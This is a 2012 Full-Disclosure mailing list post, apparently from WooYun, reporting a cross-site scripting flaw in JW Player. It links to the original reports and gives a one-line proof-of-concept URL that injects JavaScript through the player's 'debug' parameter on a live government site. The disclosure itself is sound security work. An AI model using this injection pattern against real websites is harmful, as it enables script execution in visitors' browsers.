[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] JW player xss security flaw

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] JW player xss security flaw
From: WooYun <root@xxxxxxxxxx>
Date: Wed, 16 May 2012 14:29:34 +0800

"LongTail Video is a New York-based startup that has pioneered the web
video market. Our flagship product the - JW Player - is active on over
one million websites and streams billions of videos each month."

Someone has reported a xss security flaw of JW Player on wooyun,much
more information here:

http://www.wooyun.org/bugs/wooyun-2010-07166

from: http://www.wooyun.org/whitehats/gainover

a example here:

http://www.wooyun.org/bugs/wooyun-2010-07165

http://www.whitehouse.gov/files/flash/player.swf?debug=function(){var
a=alert;a(1)}

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] struts csrf token bypass
Next by Date: Re: [Full-disclosure] Trigerring Java code from a SVG image
Previous by thread: [Full-disclosure] struts csrf token bypass
Next by thread: [Full-disclosure] [PRE-SA-2012-03] Linux kernel: Buffer overflow in HFS plus filesystem
Index(es):
- Date
- Thread